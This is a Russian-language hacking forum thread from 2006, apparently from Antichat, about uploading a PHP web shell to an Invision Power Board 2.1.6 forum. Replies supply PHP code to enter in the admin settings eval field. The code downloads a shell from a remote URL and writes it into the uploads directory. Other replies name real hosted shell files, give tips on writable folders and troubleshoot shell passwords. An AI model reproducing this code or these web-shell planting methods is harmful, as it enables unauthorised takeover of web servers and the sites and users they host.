Ipb 2.1.6 проблема с шеллом

Discussion in 'Песочница' started by =XSS=, 22 Nov 2006.

  1. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    IPB 2.1.6
    пытаюсь залить на форум шелл через аватары. добавляю расширение .phtml в админке и загружаю шелл как свой аватар.
    загружается в папку uploads (пробовал и другие папки) но при обращению к залитому шеллу выходит сообщение

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.


    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


    --------------------------------------------------------------------------------

    Apache/1.3.36 Server


    как такое пофиксить?
     
  2. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    в чем тут дело?
     
  3. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    читай error.log, если есть возможность. Там вся инфа об ошибке
     
  4. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Попробуй залить вот этим способом у меня всегда получалось.

    Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
    PHP код:
    $linky="http://site.ru/shell.txt";
    $saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
    $from=fopen("$linky","r");
    $to=fopen("$saved","w");
    while(!feof($from)){
    $string=fgets($from,4096);
    fputs($to,$string);
    }
    fclose($to);
    fclose($from);

    Если не получится почитай статью "Заливаем шелл в Ipb 2.*.*(и больше не спрашиваем:))" автор VampiRUS
     
    1 person likes this.
  5. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    ничего из этого не работает.
    ввожу этот код - нет загрузки.
     
  6. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Видно, не судьба, видно, не судьба (С)

    А вообще нафиг расширение phtml.
    Берешь файл shell.php и заливаешь его
     
  7. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    и еще надо писать что-то в полях
    Название настройки:
    и
    Группа настройки:
    ?

    или вообще ничего заполнять не надо?
     
  8. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    _Great_
    ты имеешь ввиду через аватары? но тогда надо менять настройки для загружаемого файла .php
    и менять MIME-тип файла у php на application/octet-stream
     
  9. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    сейчас такая ситуация:
    когда пытаюсь обратиться к шеллу через браузер выходит сообщение

    Parse error: syntax error, unexpected $end in /home/site/public_html/forum/uploads/shell.php on line 1078
     
  10. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    а ты попробуй..
    *.php ибп переименовывает в *.txt..

    $linky="http://site.ru/shell.txt";
    $saved="/usr/home/www/site/public_html/forum/uploads/shell.php";

    http://site.ru/shell.txt меняешь к примеру на http://grinayxakep.narod.ru/antichat.1.6.php
    /usr/home/www/site/public_html/forum/uploads/shell.php меняешь на доступную для записи диру (там где авы доспупно практ. всегда) и все работает..
     
    _________________________
    1 person likes this.
  11. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    + еще такое
    все делаю как в статье, добаляю новую настройку ввожу код, пишу имя настройки, и на выходе получаю вот это:

    IPB Предупреждение [2] fopen(http://site.narod.ru/shell.txt) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Строка: 3 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    ...
    и так много строк еще...
     
  12. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2

    $linky="http://site.narod.ru/shell.txt";
    $saved="/home/site/public_html/forum/uploads/shell.php";

    в том то и дело что не работает

    либо показывает ошибку парсинга как я писал вверху
    либо флудит вот такой ерундой

    IPB Предупреждение [2] fopen(http://site.narod.ru/shell.txt) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Строка: 3 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
    IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
     
  13. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    Читай что написанно:
    404 Not Found. Заместо site.narod.ru/site.txt надо ввести ссылку, где у тебя шелл залит.
     
  14. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    залил шелл от античат.
    почему не заливался шелл от rst ?

    и еще проблема:
    через шелл от античат был создан файл с кодом шелла от рст и я там сделал возможность входа по паролю. но шелл не хочет меня пускать. можно только юзать шелл без пароля
     
  15. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    проблема шелла от рст в том что заливается только 37.85 Kb от файла. фиг знает почему?
     
  16. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    откуда ты его заливаешь?? вот отсюда пробни http://gbl.nightmail.ru/rst.php
    на будущее проверяй сначало все и старайся не тупить жестко.. site.ru/shell.txt мог бы пошевелись извилиной..
     
    _________________________
  17. =XSS=

    =XSS= New Member

    Joined:
    21 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -2
    всем спасибо!

    c411k
    ты имеешь ввиду с народа нельзя заливать?

    и еще как можно объяснить то что шелл отказывается авторизовывать меня по моему паролю который записан в шелле как md5 ?
    я проверял несколько раз - не пускает!!!
     
  18. ][AКЕР

    ][AКЕР New Member

    Joined:
    28 Jun 2006
    Messages:
    11
    Likes Received:
    1
    Reputations:
    -4
    попробуй поменять пароль!без md5
     
Loading...